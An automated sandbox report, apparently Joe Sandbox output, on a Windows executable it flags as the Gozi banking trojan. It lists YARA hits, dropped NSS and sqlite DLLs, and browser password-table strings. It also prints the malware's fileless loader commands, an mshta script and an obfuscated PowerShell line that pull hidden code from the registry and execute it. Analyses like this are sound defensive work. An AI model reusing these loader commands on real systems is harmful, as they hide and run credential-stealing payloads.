Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
PE file contains more sections than normal
Source: sqlite3.dll.0.dr Static PE information: Number of sections : 18 > 10
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\LocalLow\freebl3.dll B2AE93D30C8BEB0B26F03D4A8325AC89B92A299E8F853E5CAA51BB32575B06C6
Uses 32bit PE files
Source: EJ6FBXJ9Dg.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000001.00000002.564376637.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000001.00000002.564376637.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000007.00000002.637060024.0000024AC5DCC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000001.00000003.511115658.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000001.00000003.511115658.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000001.00000003.463138382.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000001.00000003.463138382.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000001.00000003.508255245.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000001.00000003.508255245.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000001.00000003.463345859.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000001.00000003.463345859.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000001.00000003.463360995.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000001.00000003.463360995.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000001.00000003.463226979.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000001.00000003.463226979.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000001.00000003.463317653.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000001.00000003.463317653.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000001.00000003.463266718.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000001.00000003.463266718.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000001.00000003.463179986.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000001.00000003.463179986.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000001.00000003.510097829.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000001.00000003.510097829.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000001.00000003.463066679.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000001.00000003.463066679.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: XHSRZM23.exe PID: 1460, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: XHSRZM23.exe PID: 1460, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 5920, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5920, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: String function: 00AFADA7 appears 129 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Code function: 1_2_00401493 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 1_2_00401493
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Code function: 1_2_00401D95 GetProcAddress,NtCreateSection,memset, 1_2_00401D95
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Code function: 1_2_00401F78 NtMapViewOfSection, 1_2_00401F78
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Code function: 1_2_0046737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_0046737C
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Code function: 1_2_00468521 NtQueryVirtualMemory, 1_2_00468521
Source: XHSRZM23.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EJ6FBXJ9Dg.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe File created: C:\Users\user\AppData\LocalLow\nss3.dll Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@15/27@3/3
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: EJ6FBXJ9Dg.exe Virustotal: Detection: 65%
Source: EJ6FBXJ9Dg.exe Metadefender: Detection: 50%
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe C:\Users\user\Desktop\EJ6FBXJ9Dg.exe
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Process created: C:\Users\user\AppData\Roaming\XHSRZM23.exe "C:\Users\user\AppData\Roaming\XHSRZM23.exe"
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ndam='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ndam).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nhefowhe -value gp; new-alias -name ucvjneg -value iex; ucvjneg ([System.Text.Encoding]::ASCII.GetString((nhefowhe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mkr2iq4u.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF206.tmp" "c:\Users\user\AppData\Local\Temp\CSCC9AB450BCFA441ED9B999D6FD5DE3822.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jv54rgf4.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFF35.tmp" "c:\Users\user\AppData\Local\Temp\CSC20F2306B39284E32B5AB6E9725E2189D.TMP"
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Process created: C:\Users\user\AppData\Roaming\XHSRZM23.exe "C:\Users\user\AppData\Roaming\XHSRZM23.exe" Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nhefowhe -value gp; new-alias -name ucvjneg -value iex; ucvjneg ([System.Text.Encoding]::ASCII.GetString((nhefowhe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mkr2iq4u.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jv54rgf4.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF206.tmp" "c:\Users\user\AppData\Local\Temp\CSCC9AB450BCFA441ED9B999D6FD5DE3822.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFF35.tmp" "c:\Users\user\AppData\Local\Temp\CSC20F2306B39284E32B5AB6E9725E2189D.TMP" Jump to behavior
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jtb51wp4.4ti.ps1 Jump to behavior
Source: softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %s
Source: sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3.dll.0.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: EJ6FBXJ9Dg.exe, 00000000.00000003.310211523.0000000003FD4000.00000004.00000800.00020000.00000000.sdmp, sF9O6f0cCdbK.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: sqlite3.dll.0.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: sqlite3.dll.0.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AFB02C CreateToolhelp32Snapshot,Process32First,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,CreateProcessWithTokenW,GetModuleFileNameW,CreateProcessWithTokenW,CloseHandle,Process32Next, 0_2_00AFB02C
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_01
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Mutant created: \Sessions\1\BaseNamedObjects\264782971_qJ5tS2bD5fD1nZ5kD2kV
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
